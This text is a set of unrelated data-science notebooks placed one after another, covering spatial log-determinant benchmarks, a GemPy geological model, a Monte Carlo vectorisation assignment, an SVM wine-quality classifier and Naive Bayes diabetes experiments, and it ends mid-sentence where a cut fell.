An easy sparse algorithm for this problem uses `scipy.sparse.linalg.splu`, the SuperLU-backed Sparse LU Decomposition. Using a similar logic to the SVD strategy, an LU decomposition of $A$ is constructed:
$$ LU = A$$
and the sum of the logged absolute value of the diagonals provides the log determinant. Since the SuperLU algorithm provides $L$ with all ones on the diagonal, the upper triangular matrix can be used alone for the log determinant.
$$ \log|A| = \sum_i^n \log(|U_{ii}|)$$
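The three identities can be checked numerically on a small synthetic row-standardized $W$. This is a hedged sketch: it uses NumPy's `slogdet` as the dense reference, whereas the notebook's dense path goes through the PyMC3 SVD op, and the random $W$ is purely illustrative.

```python
import numpy as np
import scipy.sparse as spar
import scipy.sparse.linalg as spla

rng = np.random.default_rng(0)
n, rho = 50, 0.5
W = rng.random((n, n)) * (rng.random((n, n)) < 0.1)        # ~10% nonzero
np.fill_diagonal(W, 0)
W = W / np.maximum(W.sum(axis=1, keepdims=True), 1e-12)    # row-standardize
A = np.eye(n) - rho * W

ld_dense = np.linalg.slogdet(A)[1]                         # dense reference

lu = spla.splu(spar.csc_matrix(A))                         # sparse LU: L has unit diagonal
ld_lu = np.sum(np.log(np.abs(lu.U.diagonal())))

e = np.linalg.eigvals(W)                                   # Ord (1975) eigenvalue identity
ld_ord = np.sum(np.log(np.abs(1 - rho * e)))
print(ld_dense, ld_lu, ld_ord)
```

All three agree to numerical precision; permutations in the LU factorization only flip the sign of the determinant, which the absolute value discards.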
### Comparing the three methods
So, to compare speed, I'll look at the three methods on the very sparse but relatively small $470 \times 470$ matrix of counties in TX, OK, AR, and LA.
In the image below, the weights matrix is shown. Entries that are non-zero are in black. So, the matrix is very sparse and diagonally-dominant.
```
plt.imshow(W.sparse.toarray()>0, cmap='Greys')
```
Both the Ord and LU determinant `Op`s are specific to a given $W$, so they must be instantiated before running the comparison. For fairness, I'll measure the time it takes to instantiate either of them, and consider the number of evaluations of the log determinant that is necessary to justify the caching/precomputation.
In what follows, I run 1000 iterations of the log determinant computation for random $\rho$ in $[-1,1)$, the range of stable spatial autoregressive coefficients that are commonly encountered in practice. `sparse` contains the sparse LU decomposition, `dense` contains the standard PyMC3 SVD strategy, and `evals` contains the Ord Eigenvalue approach.
```
import time as t
sparse = []
dense = []
evals = []
Wd = W.sparse.toarray()
I = np.eye(W.n)
cache_time = t.time()
spld = ops.CachedLogDet(W)
cache_time = t.time() - cache_time
eval_time = t.time()
evals_W = np.linalg.eigvals(Wd)
eval_time = t.time() - eval_time
# `ordld` below is assumed to be an Ord eigenvalue log-det Op from the local
# `ops` module, instantiated from `evals_W` analogously to `spld`
for _ in range(1000):
    rho = np.random.random()*2 - 1  # rho uniform over [-1, 1)
    etime = t.time()
    result = spld(rho).eval()
    etime = t.time() - etime
    sparse.append((rho, result, etime))
    A = I - rho * Wd
    etime = t.time()
    result = mc.math.logdet(A).eval()
    etime = t.time() - etime
    dense.append((rho, result, etime))
    etime = t.time()
    result = ordld(rho).eval()
    etime = t.time() - etime
    evals.append((rho, result, etime))
sparse = np.asarray(sparse)
dense = np.asarray(dense)
evals = np.asarray(evals)
```
First off, the log determinant recovered by all approaches is identical:
```
np.testing.assert_allclose(sparse[:,1], evals[:,1])
np.testing.assert_allclose(sparse[:,1], dense[:,1])
plt.scatter(sparse[:,0], sparse[:,1], label='Sparse', marker='o')
plt.scatter(evals[:,0], evals[:,1], label='evals', marker='^')
plt.scatter(dense[:,0], dense[:,1], marker='x', label='Dense')
plt.title('LogDet Values', fontsize=20)
plt.legend(fontsize=16, loc='lower center')
plt.xlabel(r'$\rho$', fontsize=16)
plt.ylabel(r'$log|A|$', fontsize=16)
```
Disregarding the precomputation time, the Eigenvalue method is the fastest both on average and in almost every pass. The sparse method takes over double the time that the eigenvalue method takes on average. And, the dense method takes over 10 times the time the sparse method requires, and nearly 30 times the average time for the eigenvalue method.
```
evals[:,2].mean(), sparse[:,2].mean(), dense[:,2].mean()
plt.scatter(sparse[:,0], sparse[:,2], label='Sparse', marker='o')
plt.scatter(evals[:,0], evals[:,2], label='Evals', marker='^')
plt.scatter(dense[:,0], dense[:,2], marker='x', label='Dense')
plt.title('Timings', fontsize=20)
plt.ylabel('Seconds', fontsize=16)
plt.xlabel(r'$\rho$', fontsize=16)
plt.legend(fontsize=16, ncol=3, bbox_to_anchor=(1.,-.2))
```
However, computing the eigenvalues takes a full two seconds of precomputation. So, for one-off log determinants, this method is exceedingly inefficient. However, after only seven evaluations of the log determinant, the precomputation method required by the eigenvalue strategy breaks even with the SVD time.
```
np.mean([eval_time] + evals[:,2][:6].tolist()), dense[:,2].mean()
```
However, it takes much longer to amortize the eigenvalue precomputation time compared to the sparse LU approach. The amortization curve for the sparse method is nearly flat, since the fraction of the total computation time consumed in precomputation is nearly zero. However, the amortization curve of the eigenvalue method is *very* steep, and it becomes more efficient than the sparse evaluation method only after around 125 evaluations of the log determinant.
```
support = np.arange(50,200,1)
plt.plot(support,
[np.mean(eval_time/k + evals[:,2].mean()) for k in support], label='Ord')
plt.plot(support,
[np.mean(cache_time/k + sparse[:,2].mean()) for k in support], label='SuperLU')
plt.title('Amortization Curve', fontsize=20)
plt.ylabel('Average Time', fontsize=20)
plt.xlabel('Evaluations of log$(|A|)$', fontsize=20)
plt.legend(fontsize=20)
```
In general, it's difficult to characterize how this scales with respect to $N$, since the structure of the connectivity matrix for additional observations greatly affects the speed of the various approaches. However, it appears that, in general, for sparse $W$, the sparse LU or eigenvalue strategy are much more efficient for this specific problem.
```
# Importing GemPy
import gempy as gp
# Importing aux libraries
from ipywidgets import interact
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from gempy.plot import visualization_2d as vv
from gempy.plot import vista
```
## Loading the xarray
We want to import the data from disk, where it is stored as a netCDF file.
```
import xarray as xr
fat_grid = xr.open_dataset('../data/fatiando_gridded_data.nc')
fat_grid
```
## Initializating model
First we create a model to store things in.
```
geo_model = gp.create_model('From_Fatiando')
# We will create the regular grid afterwards
geo_model = gp.init_data(geo_model)
geo_model.add_surfaces(['mag_surface', 'basement'])
gp.set_interpolator(geo_model, theano_optimizer='fast_compile', verbose=[])
```
### Xarray to pandas
This seems to give something reasonably shaped.
Our next issue is to add points and surfaces. In theory, we can use each axis to create the points, but that will almost certainly be too many.
GemPy expects to be given a `DataFrame`, not a `Dataset`, so we will need to convert it. It also expects to find the columns `X|x`, `Y|y`, `Z|z` and one of `surface`, `Surface`, `surfaces`, `Surfaces`, `formations`, or `formation`, which probably do not exist from harmonica by default.
Note: being able to set this might be nice if I am importing a cube of points.
```
df_fat_grid = fat_grid.to_dataframe()
df_fat_grid.reset_index(inplace=True)
new_columns = {'easting': 'X',
'northing': 'Y',
}
df_fat_grid.rename(columns=new_columns, inplace=True)
df_fat_grid['surface'] = 'mag_surface'
# Adding Z anisotropy
df_fat_grid['Z'] = df_fat_grid['magnetic_anomaly'] * 50
df_fat_grid
```
### Decimating surface points
We need to decimate the data somehow, so that we have fewer points.
```
dec_df_fat_grid = df_fat_grid.iloc[::150].reset_index()
# Setting the df to gempy
geo_model.set_surface_points(dec_df_fat_grid,
update_surfaces=False)
```
#### Creating one orientation (minimum required)
The minimum amount of data for GemPy is:
- 2 surface points per surface
- 1 orientation per series
Note: I am not sure what happened to the error message about this. We need a patch.
```
# Create a dummy orientation far away from the model
geo_model.add_orientations(-323835.075764, 4.223884e+06, 36000.098226, pole_vector=(0,0,1), surface='mag_surface')
```
## Adding grid around
The model needs some extents, in the format `[x_min, x_max, y_min, y_max, z_min, z_max]`.
We want to use the extents from the fatiando grid, which we can extract thus. The z coords are a little weird, so I am guessing them for now. This would presumably be how deep you expect your model to actually extend. For mag data, a couple of km seems reasonable for now, but we want to vertically exaggerate things, in this case by a factor of 50.
```
geo_model.set_regular_grid([geo_model.surface_points.df['X'].min(),
geo_model.surface_points.df['X'].max(),
geo_model.surface_points.df['Y'].min(),
geo_model.surface_points.df['Y'].max(),
geo_model.surface_points.df['Z'].min(),
geo_model.surface_points.df['Z'].max()], [50,50,50])
p3d = gp.plot_3d(geo_model)
geo_model.surfaces.df
# The default value of the covariance is 0 because we didn't
# have orientations when we use set_interpolator
geo_model.additional_data
# To set the default values now that all data is in place
# we need to call the following
geo_model.update_additional_data()
geo_model.update_to_interpolator()
gp.compute_model(geo_model)
```
The above error seems to be from placing points outside the plotting area.
```
p3d = gp.plot_3d(geo_model, plotter_type='background')
# With this you can just move the points
p3d.toggle_live_updating()
```
It seems that the range is too large
```
# Range defines how close the parameters influence each other
geo_model.modify_kriging_parameters('range', 20000)
p3d.update_surfaces()
p3d.update_surfaces()
# Smooth controls how closely the surface goes through the points
geo_model.modify_surface_points(geo_model.surface_points.df.index, smooth=1000, plot_object=p3d)
geo_model.orientations
gp.plot_3d(geo_model, image=True)
```
# Machine Learning and Big Data
## Assignment 0: Vectorization
Guillermo García Patiño Lenza
Mario Quiñones Pérez
### Objectives:
This assignment demonstrates that NumPy's vectorized computation is much more efficient than performing the same calculations with traditional Python loops. To show this, the Monte Carlo method for computing the definite integral of a function between two points has been implemented both ways, and the execution times have been compared for different numbers of random points.
### Implemented functions:
#### 1. Integra_mc:
This function receives as parameters the function to integrate (func), the two endpoints of the definite integral (a and b), and the number of random points (num_puntos) generated to approximate the calculation. It computes an approximate maximum of the function (m), generates num_puntos random x-values in the interval (a, b) and num_puntos random y-values in (0, m), evaluates the function at the x-values, and computes the fraction (c) of randomly generated (x, y) pairs satisfying y <= func(x). The integral estimate is then the product A = c * (b - a) * m.
```
def integra_mc(func, a, b, num_puntos=100):
    # approximate the maximum of func on [a, b]
    puntos = np.linspace(a, b, num_puntos)
    m = np.max(func(puntos))
    # random (x, y) pairs: x uniform in [a, b), y uniform in [0, m)
    xpuntos = np.random.uniform(a, b, num_puntos)
    ypuntos = np.random.uniform(0, m, num_puntos)
    por_debajo = np.sum(ypuntos < func(xpuntos))
    return (por_debajo / num_puntos) * (b - a) * m
```
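As a quick self-contained sanity check (a hedged sketch, not part of the original assignment): the hit-or-miss estimator should approach the analytic value of a known integral, here $\int_0^1 x^2\,dx = 1/3$.

```python
import numpy as np

def mc_integral(f, a, b, n=100_000, seed=0):
    rng = np.random.default_rng(seed)
    m = f(np.linspace(a, b, n)).max()    # approximate maximum of f on [a, b]
    xs = rng.uniform(a, b, n)
    ys = rng.uniform(0, m, n)
    # fraction of points under the curve, scaled by the bounding box area
    return (ys < f(xs)).mean() * (b - a) * m

est = mc_integral(lambda x: x**2, 0.0, 1.0)
print(est)   # close to 1/3
```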
#### 2. Integra_mc1:
This function performs the same calculation as the previous one, but using traditional Python loops.
```
def integra_mc1(func, a, b, num_puntos=10000):
    # approximate the maximum of func on [a, b]
    punto_f = func(a)
    for num in range(num_puntos):
        aux = a + (b - a) * num / num_puntos
        aux_f = func(aux)
        if aux_f > punto_f:
            punto_f = aux_f
    # count random (x, y) pairs that fall below the curve
    por_debajo = 0
    for num in range(num_puntos):
        fx = func(random.uniform(a, b))
        y = random.uniform(0, punto_f)
        if y < fx:
            por_debajo = por_debajo + 1
    return (por_debajo / num_puntos) * (b - a) * punto_f
```
#### 3. Toma_tiempos:
This function computes the integral of f between the given endpoints for several values of num_puntos, recording and storing how long each run takes.
```
import time

# timing helpers (assumed by toma_tiempos): each one times a single call
def tiempo_vectorizado(f, a, b, n):
    t0 = time.process_time(); integra_mc(f, a, b, n)
    return time.process_time() - t0

def tiempo_bucles(f, a, b, n):
    t0 = time.process_time(); integra_mc1(f, a, b, n)
    return time.process_time() - t0

def toma_tiempos(f, a, b):
    t_bucles = []
    t_vectorizado = []
    tamanios = np.linspace(1, 100000, 100, dtype=int)
    for i in tamanios:
        t_vectorizado.append(tiempo_vectorizado(f, a, b, i))
        t_bucles.append(tiempo_bucles(f, a, b, i))
    return (t_bucles, t_vectorizado, tamanios)
```
#### 4. Main:
This is the program's entry point. It extracts the integration endpoints from the arguments the program is called with, generates the timing plot, and saves it to a PNG.
```
import sys
import numpy as np
import random
import time
import matplotlib.pyplot as plt

def func(x):
    return -(x**2) + 5*x + 5

def main():
    args = sys.argv
    # a, b = args[1], args[2]
    a, b = 2, 5
    t = toma_tiempos(func, a, b)
    # t = (loop times, vectorized times, sizes)
    plt.figure()
    plt.scatter(t[2], t[0], c='red', label='loop')
    plt.scatter(t[2], t[1], c='blue', label='vectorized')
    plt.legend()
    plt.savefig('tiempos2.png')  # save before show(), which clears the current figure
    plt.show()
```
### Conclusions:
After running the code above, we obtained the plot below, which clearly shows that NumPy is more efficient for this kind of computation than traditional loops. The plot was generated using 100 different sizes between 1 and 100,000 for both computation methods.
As a final note, although the difference in efficiency may not look dramatic here, for larger cases than these it should become much more noticeable, both in the plot and in actual execution time.

# Data description & Problem statement:
The dataset is related to red vinho verde wine samples, from the north of Portugal. The goal is to model wine quality based on physicochemical tests. For more details, please check: https://archive.ics.uci.edu/ml/datasets/wine+quality
* The dataset is imbalanced. The red-wine data has 1599 rows and 12 columns.
* This is a classification problem. The classification goal is to predict wine quality based on physicochemical tests.
# Workflow:
- Load the dataset, and define the required functions (e.g. for detecting the outliers)
- Data Cleaning/Wrangling: Manipulate outliers, missing data or duplicate values, Encode categorical variables, etc.
- Split data into training & test parts (utilize the training part for training & hyperparameter tuning of model, and test part for the final evaluation of model)
# Model Training:
- Build an initial SVM model, and evaluate it via C-V approach
- Use grid-search along with C-V approach to find the best hyperparameters of SVM model: Find the best SVM model (Note: I've utilized SMOTE technique via imblearn toolbox to synthetically over-sample the minority category and even the dataset imbalances.)
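For intuition, the over-sampling step can be sketched without imblearn: plain random over-sampling of the minority class up to the majority count. SMOTE goes further by interpolating new synthetic minority points rather than repeating existing ones (all names and data below are illustrative):

```python
import numpy as np
from sklearn.utils import resample

rng = np.random.default_rng(42)
X_maj = rng.normal(0, 1, size=(90, 2));  y_maj = np.zeros(90)   # majority class
X_min = rng.normal(3, 1, size=(10, 2));  y_min = np.ones(10)    # minority class

# re-sample the minority class with replacement up to the majority count
X_min_up, y_min_up = resample(X_min, y_min, replace=True,
                              n_samples=len(X_maj), random_state=42)
X_bal = np.vstack([X_maj, X_min_up])
y_bal = np.concatenate([y_maj, y_min_up])
print(X_bal.shape, y_bal.mean())
```

In practice the resampling must live inside the cross-validation pipeline (e.g. imblearn's `Pipeline`) so that only the training folds are over-sampled and the validation folds stay untouched.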
# Model Evaluation:
- Evaluate the best SVM model with optimized hyperparameters on Test Dataset, by calculating:
- AUC score
- Confusion matrix
- ROC curve
- Precision-Recall curve
- Average precision
```
import sklearn
import tensorflow as tf
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn import preprocessing
%matplotlib inline
from scipy import stats
import warnings
warnings.filterwarnings("ignore")
# Function to remove outlier rows by Z-score:
def remove_outliers(X, y, names, thresh=3):
    L = []
    for name in names:
        drop_rows = X.index[(np.abs(X[name] - X[name].mean()) >= (thresh * X[name].std()))]
        L.extend(list(drop_rows))
    outliers = np.array(list(set(L)))
    X.drop(outliers, axis=0, inplace=True)
    y.drop(outliers, axis=0, inplace=True)
    print('number of outliers removed : ', len(outliers))
df=pd.read_csv('C:/Users/rhash/Documents/Datasets/wine quality/winequality-red.csv', sep=';')
df['quality']=df['quality'].map({3:'L', 4:'L', 5:'L', 6:'L', 7:'H', 8:'H'})
df['quality']=df['quality'].map({'L':0, 'H':1})
# To Shuffle the data:
np.random.seed(42)
df=df.reindex(np.random.permutation(df.index))
df.reset_index(inplace=True, drop=True)
df.head()
df.info()
X=df.drop('quality', axis=1)
y=df['quality']
# We initially devide data into training & test folds: We do the Grid-Search only on training part
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=42)
# Removing outliers:
remove_outliers(X_train, y_train, ['fixed acidity', 'volatile acidity', 'citric acid', 'residual sugar',
'chlorides', 'free sulfur dioxide', 'total sulfur dioxide', 'density',
'pH', 'sulphates', 'alcohol'], thresh=9)
from sklearn.preprocessing import StandardScaler, MinMaxScaler
scaler=MinMaxScaler().fit(X_train)
X_train=scaler.transform(X_train)
X_test=scaler.transform(X_test)
# We build the Initial Model & Cross-Validation:
from sklearn.svm import SVC
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import StratifiedKFold
model=SVC(C=10, gamma=0.1, random_state=42)
kfold=StratifiedKFold(n_splits=5, shuffle=True, random_state=42)
scores=cross_val_score(model, X_train, y_train, cv=kfold, scoring="roc_auc")
print(scores, "\n")
print("AUC: %0.2f (+/- %0.2f)" % (scores.mean(), scores.std()))
# Grid-Search for the best model parameters:
# Rough Search (Round 1)
from sklearn.model_selection import GridSearchCV
param={'kernel':['rbf'], 'C': [0.1, 0.5, 1, 5, 10, 100, 1000], 'gamma':[0.1, 0.5, 1, 5, 10, 15, 20, 25]}
kfold=StratifiedKFold(n_splits=4, shuffle=True, random_state=42)
grid_search=GridSearchCV(SVC(class_weight='balanced'), param, cv=kfold, scoring="roc_auc", n_jobs=-1)
grid_search.fit(X_train, y_train)
# Grid-Search report:
G=pd.DataFrame(grid_search.cv_results_)
G.sort_values("rank_test_score").head(3)
print("Best parameters: ", grid_search.best_params_)
print("Best validation AUC: %0.2f (+/- %0.2f)" % (np.round(grid_search.best_score_, decimals=2), np.round(G.loc[grid_search.best_index_, "std_test_score"], decimals=2)))
print("Test score: ", np.round(grid_search.score(X_test, y_test),2))
h=G[["param_C", "param_gamma", "mean_test_score"]].pivot_table(index="param_C", columns="param_gamma", values="mean_test_score")
sns.heatmap(h, annot=True)
from sklearn.metrics import roc_curve, auc, confusion_matrix, classification_report
# Plot a confusion matrix.
# cm is the confusion matrix, names are the names of the classes.
def plot_confusion_matrix(cm, names, title='Confusion matrix', cmap=plt.cm.Blues):
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(names))
plt.xticks(tick_marks, names, rotation=45)
plt.yticks(tick_marks, names)
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('Predicted label')
class_names=["0", "1"]
# Compute confusion matrix
cm = confusion_matrix(y_test, grid_search.predict(X_test))
np.set_printoptions(precision=2)
print('Confusion matrix, without normalization')
print(cm)
# Normalize the confusion matrix by row (i.e by the number of samples in each class)
cm_normalized = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
print('Normalized confusion matrix')
print(cm_normalized)
plt.figure()
plot_confusion_matrix(cm_normalized, class_names, title='Normalized confusion matrix')
plt.show()
# Classification report:
report=classification_report(y_test, grid_search.predict(X_test))
print(report)
# ROC curve & auc:
from sklearn.metrics import precision_recall_curve, roc_curve, roc_auc_score, average_precision_score
fpr, tpr, thresholds=roc_curve(np.array(y_test), grid_search.decision_function(X_test) , pos_label=1)
roc_auc=roc_auc_score(np.array(y_test), grid_search.decision_function(X_test))
plt.figure()
plt.step(fpr, tpr, color='darkorange', lw=2, label='ROC curve (auc = %0.2f)' % roc_auc)
plt.plot([0, 1], [0, 1], color='navy', alpha=0.4, lw=2, linestyle='--')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('ROC curve')
plt.legend(loc="lower right")
plt.plot([cm_normalized[0,1]], [cm_normalized[1,1]], 'or')
plt.show()
# Precision-Recall trade-off:
precision, recall, thresholds=precision_recall_curve(y_test,grid_search.decision_function(X_test), pos_label=1)
ave_precision=average_precision_score(y_test,grid_search.decision_function(X_test))
plt.step(recall, precision, color='navy')
plt.xlabel('Recall')
plt.ylabel('Precision')
plt.ylim([0, 1.01])
plt.xlim([0, 1.001])
plt.title('Precision-Recall curve: AP={0:0.2f}'.format(ave_precision))
plt.plot(cm_normalized[1,1], cm[1,1]/(cm[1,1]+cm[0,1]), 'ob')
plt.show()
```
```
%matplotlib inline
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
from sklearn.naive_bayes import BernoulliNB, GaussianNB
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split, GridSearchCV
from sklearn.metrics import confusion_matrix, auc, roc_curve, roc_auc_score, classification_report
from sklearn.metrics import recall_score, precision_score, accuracy_score, f1_score
np.random.seed(44)
def print_scores(y_test, y_pred, y_pred_prob):
print('recall score:',recall_score(y_test, y_pred))
print('precision score:',precision_score(y_test, y_pred))
    print('f1 score (harmonic mean of precision and recall):', f1_score(y_test, y_pred))
print('accuracy score:',accuracy_score(y_test,y_pred))
df = pd.read_csv('data/diabetes.csv')
df.head()
print("Outcome as pie chart:")
fig, ax = plt.subplots(1, 1)
ax.pie(df.Outcome.value_counts(), autopct='%1.1f%%', labels=['No Diabetes', 'Diabetes'], colors=['yellowgreen', 'r'])
plt.axis('equal')
plt.ylabel('')
# Plot Age to see if there is any trend
print("Age")
print(df["Age"].tail(5))
fig, (ax1, ax2) = plt.subplots(2, 1, sharex = True, figsize=(6,3))
ax1.hist(df.Age[df.Outcome==0], bins=40, color='g',alpha=0.5)
ax1.set_title('Not Diabetes')
ax1.set_xlabel('Age')
ax1.set_ylabel('# of Cases')
ax2.hist(df.Age[df.Outcome==1], bins=40, color='r',alpha=0.5)
ax2.set_title('Diabetes')
ax2.set_xlabel('Age')
ax2.set_ylabel('# of Cases')
fig, (ax3,ax4) = plt.subplots(2,1, figsize = (6,3), sharex = True)
ax3.hist(df.Pregnancies[df.Outcome==0],bins=50, color='g',alpha=0.5)
ax3.set_title('Not Diabetes')
ax3.set_ylabel('# of Cases')
ax4.hist(df.Pregnancies[df.Outcome==1],bins=50, color='r',alpha=0.5)
ax4.set_title('Diabetes')
ax4.set_xlabel('Pregnancies')
ax4.set_ylabel('# of Cases')
import seaborn as sns
import matplotlib.gridspec as gridspec
gs = gridspec.GridSpec(28, 2)
plt.figure(figsize=(15,28*5))
for i, col in enumerate(df[ df.iloc[:,0:8].columns]):
ax = plt.subplot(gs[i])
    sns.distplot(df[col][df.Outcome == 1], kde=True, bins=50, color='r')
    sns.distplot(df[col][df.Outcome == 0], kde=True, bins=50, color='g')
ax.set_xlabel('')
ax.set_ylabel('# of cases')
ax.set_title('feature: ' + str(col))
plt.show()
corr = df.corr()
corr
X = df.drop('Outcome', axis=1).values
y = df['Outcome'].values
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42, stratify=y)
print("Length of training labels:", len(y_train))
print("Length of testing labels:", len(y_test))
print("Length of training features:", len(X_train))
print("Length of testing features:", len(X_test))
```
# Bernoulli Naive-Bayes
```
bnb = BernoulliNB()
bnb.fit(X_train, y_train)
y_pred = bnb.predict(X_test)
confusion_matrix(y_test, y_pred)
pd.crosstab(y_test, y_pred, rownames=['True'], colnames=['Predicted'], margins=True)
print(classification_report(y_test, y_pred))
y_pred_proba = bnb.predict_proba(X_test)[:,1]
fpr, tpr, thresholds = roc_curve(y_test, y_pred_proba)
plt.plot([0,1],[0,1], 'k--')
plt.plot(fpr, tpr, label='BNB')
plt.xlabel('fpr')
plt.ylabel('tpr')
plt.title('Bernoulli Naive-Bayes ROC Curve')
plt.show()
roc_auc_score(y_test, y_pred_proba)
```
# Gaussian Naive-Bayes
```
gnb = GaussianNB()
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42, stratify=y)
gnb.fit(X_train, y_train)
y_pred = gnb.predict(X_test)
confusion_matrix(y_test, y_pred)
pd.crosstab(y_test, y_pred, rownames=['True'], colnames=['Predicted'], margins=True)
print(classification_report(y_test, y_pred))
y_pred_proba = gnb.predict_proba(X_test)[:,1]
fpr, tpr, thresholds = roc_curve(y_test, y_pred_proba)
plt.plot([0,1],[0,1], 'k--')
plt.plot(fpr, tpr, label='GNB')
plt.xlabel('fpr')
plt.ylabel('tpr')
plt.title('Gaussian Naive-Bayes ROC Curve')
plt.show()
roc_auc_score(y_test, y_pred_proba)
```
### Drop BMI
```
df = df.drop('BMI', axis=1)
X = df.drop('Outcome', axis=1).values
y = df['Outcome'].values
df
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42, stratify=y)
gnb.fit(X_train, y_train)
y_pred = gnb.predict(X_test)
confusion_matrix(y_test, y_pred)
pd.crosstab(y_test, y_pred, rownames=['True'], colnames=['Predicted'], margins=True)
print(classification_report(y_test, y_pred))
y_pred_proba = gnb.predict_proba(X_test)[:,1]
fpr, tpr, thresholds = roc_curve(y_test, y_pred_proba)
plt.plot([0,1],[0,1], 'k--')
plt.plot(fpr, tpr, label='GNB')
plt.xlabel('fpr')
plt.ylabel('tpr')
plt.title('Gaussian Naive-Bayes ROC Curve')
plt.show()
roc_auc_score(y_test, y_pred_proba)
```
### Drop Pregnancies
```
df = pd.read_csv('data/diabetes.csv')
df = df.drop('Pregnancies', axis=1)
X = df.drop('Outcome', axis=1).values
y = df['Outcome'].values
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42, stratify=y)
gnb.fit(X_train, y_train)
y_pred = gnb.predict(X_test)
confusion_matrix(y_test, y_pred)
pd.crosstab(y_test, y_pred, rownames=['True'], colnames=['Predicted'], margins=True)
print(classification_report(y_test, y_pred))
y_pred_proba = gnb.predict_proba(X_test)[:,1]
fpr, tpr, thresholds = roc_curve(y_test, y_pred_proba)
plt.plot([0,1],[0,1], 'k--')
plt.plot(fpr, tpr, label='GNB')
plt.xlabel('fpr')
plt.ylabel('tpr')
plt.title('Gaussian Naive-Bayes ROC Curve: Drop Pregnancies')
plt.show()
roc_auc_score(y_test, y_pred_proba)
```
### Drop Insulin
```
df = pd.read_csv('data/diabetes.csv')
df = df.drop('Insulin', axis=1)
X = df.drop('Outcome', axis=1).values
y = df['Outcome'].values
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42, stratify=y)
gnb.fit(X_train, y_train)
y_pred = gnb.predict(X_test)
confusion_matrix(y_test, y_pred)
pd.crosstab(y_test, y_pred, rownames=['True'], colnames=['Predicted'], margins=True)
print(classification_report(y_test, y_pred))
y_pred_proba = gnb.predict_proba(X_test)[:,1]
fpr, tpr, thresholds = roc_curve(y_test, y_pred_proba)
plt.plot([0,1],[0,1], 'k--')
plt.plot(fpr, tpr, label='GNB')
plt.xlabel('fpr')
plt.ylabel('tpr')
plt.title('Gaussian Naive-Bayes ROC Curve: Drop Insulin')
plt.show()
roc_auc_score(y_test, y_pred_proba)
```
## Drop DiabetesPedigreeFunction
```
df = pd.read_csv('data/diabetes.csv')
df = df.drop('DiabetesPedigreeFunction', axis=1)
X = df.drop('Outcome', axis=1).values
y = df['Outcome'].values
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42, stratify=y)
gnb.fit(X_train, y_train)
y_pred = gnb.predict(X_test)
confusion_matrix(y_test, y_pred)
pd.crosstab(y_test, y_pred, rownames=['True'], colnames=['Predicted'], margins=True)
print(classification_report(y_test, y_pred))
y_pred_proba = gnb.predict_proba(X_test)[:,1]
fpr, tpr, thresholds = roc_curve(y_test, y_pred_proba)
plt.plot([0,1],[0,1], 'k--')
plt.plot(fpr, tpr, label='GNB')
plt.xlabel('fpr')
plt.ylabel('tpr')
plt.title('Gaussian Naive-Bayes ROC Curve: Drop DiabetesPedigreeFunction')
plt.show()
roc_auc_score(y_test, y_pred_proba)
```
### Drop SkinThickness
```
df = pd.read_csv('data/diabetes.csv')
df = df.drop('SkinThickness', axis=1)
X = df.drop('Outcome', axis=1).values
y = df['Outcome'].values
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42, stratify=y)
gnb.fit(X_train, y_train)
y_pred = gnb.predict(X_test)
confusion_matrix(y_test, y_pred)
pd.crosstab(y_test, y_pred, rownames=['True'], colnames=['Predicted'], margins=True)
print(classification_report(y_test, y_pred))
y_pred_proba = gnb.predict_proba(X_test)[:,1]
fpr, tpr, thresholds = roc_curve(y_test, y_pred_proba)
plt.plot([0,1],[0,1], 'k--')
plt.plot(fpr, tpr, label='GNB')
plt.xlabel('fpr')
plt.ylabel('tpr')
plt.title('Gaussian Naive-Bayes ROC Curve: Drop SkinThickness')
plt.show()
roc_auc_score(y_test, y_pred_proba)
```
### Drop Insulin & SkinThickness
```
df = pd.read_csv('data/diabetes.csv')
df = df.drop(['SkinThickness', 'Insulin'], axis=1)
X = df.drop('Outcome', axis=1).values
y = df['Outcome'].values
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42, stratify=y)
gnb.fit(X_train, y_train)
y_pred = gnb.predict(X_test)
confusion_matrix(y_test, y_pred)
pd.crosstab(y_test, y_pred, rownames=['True'], colnames=['Predicted'], margins=True)
print(classification_report(y_test, y_pred))
y_pred_proba = gnb.predict_proba(X_test)[:,1]
fpr, tpr, thresholds = roc_curve(y_test, y_pred_proba)
plt.plot([0,1],[0,1], 'k--')
plt.plot(fpr, tpr, label='GNB')
plt.xlabel('fpr')
plt.ylabel('tpr')
plt.title('Gaussian Naive-Bayes ROC Curve: Drop Insulin & SkinThickness')
plt.show()
roc_auc_score(y_test, y_pred_proba)
```
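The repeated drop-one-feature experiments above all follow an identical pattern, so they could be consolidated into a single helper. A minimal sketch (synthetic data with diabetes-like column names stands in for `diabetes.csv`, and the name `auc_without` is invented for illustration):

```python
import pandas as pd
from sklearn.datasets import make_classification
from sklearn.model_selection import train_test_split
from sklearn.naive_bayes import GaussianNB
from sklearn.metrics import roc_auc_score

def auc_without(df, dropped, target='Outcome'):
    """Fit GaussianNB with the `dropped` columns removed; return test AUC."""
    X = df.drop(columns=[target] + list(dropped)).values
    y = df[target].values
    X_tr, X_te, y_tr, y_te = train_test_split(
        X, y, test_size=0.2, random_state=42, stratify=y)
    gnb = GaussianNB().fit(X_tr, y_tr)
    return roc_auc_score(y_te, gnb.predict_proba(X_te)[:, 1])

# Synthetic stand-in frame (made-up values, real-looking column names):
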